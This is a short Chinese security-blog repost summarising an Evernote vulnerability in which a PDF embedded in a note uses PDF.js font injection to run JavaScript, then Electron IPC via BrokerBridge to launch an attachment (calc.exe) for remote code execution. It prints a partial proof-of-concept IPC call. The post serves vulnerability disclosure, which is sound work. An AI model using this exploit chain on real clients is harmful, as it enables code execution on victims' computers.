Evernote 应用中PDF.js字体注入导致跨平台远程代码执行漏洞

admin 2024年7月11日11:45:53评论19 views字数 1224阅读4分4秒阅读模式

前言

一句话总结(点击原文跳转)

主要描述了一个在Evernote应用中发现的关键性漏洞,该漏洞可以通过嵌入恶意PDF文件到笔记中,利用PDF.js的字体注入进行JavaScript代码执行,进而通过Electron的ipcRenderer和BrokerBridge实现跨进程通信,最终达到远程代码执行(RCE)的攻击链。

关键信息点

Evernote 应用中PDF.js字体注入导致跨平台远程代码执行漏洞

//部分poc
window.top.electronApi.ipcRenderer.send('BrokerBridge', {action: 'Bridge/Call',id: '7e803824-d666-4ffe-9ebb-39ac1bd7856f',topics: 'boron.actions.openFileAttachment',data:{'resource': {'hash':'2f82623f9523c0d167862cad0eff6806','mime': 'application/octet-stream','rect': {'left': 68,'top': 155,'width': 728.1428833007812,'height': 43.42857360839844},'state': 'loaded','reference': '22cad1af-d431-4af6-b818-0e34f9ff150b','selected': true,'url': 'en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f','isInk': false,'filesize': 45056,'filename': 'calc.exe'},'url':'en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d167862cad0eff6806+https://www.evernote.com/shard/s708/res/54938bad-ecb2-3aaa-6ad0-a9b7958d402f','noteGuid': 'f4cbd0d2-f670-52a7-7ea7-5720d65614fd','appName': ''}})

某知名安全大V,昨日印象笔记被黑

Evernote 应用中PDF.js字体注入导致跨平台远程代码执行漏洞

原文始发于微信公众号(甲方安全建设):Evernote 应用中PDF.js字体注入导致跨平台远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月11日11:45:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Evernote 应用中PDF.js字体注入导致跨平台远程代码执行漏洞http://cn-sec.com/archives/2941437.html

发表评论

匿名网友 填写信息